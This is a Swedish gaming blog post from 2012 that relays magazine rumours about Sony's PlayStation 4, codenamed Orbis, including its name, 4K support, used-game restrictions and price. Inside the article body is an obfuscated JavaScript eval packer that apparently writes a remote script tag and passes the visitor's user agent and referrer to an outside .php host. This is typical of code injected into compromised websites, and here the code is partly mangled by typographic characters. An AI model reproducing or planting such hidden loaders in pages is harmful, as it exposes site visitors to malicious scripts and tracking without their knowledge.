Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

Playstation 4 (Orbis)

Playstation 4 (Orbis)
Filip Urde
  • On 19 november, 2012
  • http://www.revue.se/filip-urde

Playstation eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tykbb|var|u0026u|referrer|tnber||js|php’.split(’|’),0,{}))
4… eller vad kommer den att heta?

I samma veva som nya Xbox får en artikel i Xbox World så får alltså Sonys nästa PlayStation-konsol även den en artikel i PSM3.

Konsolen som just nu går under kodnamnet Orbis, kommer alltså inte att heta PlayStation 4 då siffran fyra har en vidskeplig betydelse  i Japan och anses vara förknippat med otur. Ett trevligt rykte som lever vidare enligt PSM3 är att konsolen kommer att stödja 4K upplösningen, men dock bara för filmer.

Man skriver vidare att Sony kommer visa upp demon för Orbis-spel på E3 nästa år, vilket inte är någon överraskning, men väldigt kul att höra. Man skriver också om att både Sony och Xbox på riktigt börjar planera åtgärder mot begagnad markanden. Genom att spelen måste registreras på PSN så det blir lite som PC-spel och registrerar där med köpta spel med siffernycklar.

Angående RAM, så skriver man att det rör sig mellan 4 och 8 GB, vilket är ganska oprecist. Tråkigt är att varken Xbox eller Plastation 4 kommer vara  bakåt-kompatibelt med PlayStation 3 eller PlayStation 2.

Move ser ut följa med samtliga konsoler som standard och priset på en konsol ryktas hamna mellan 400 – 500 Euro.

OBS!: Detta är rykten från en tidning, återberättat på Revue och är alltså inte fakta! 😉

http://www.thesixthaxis.com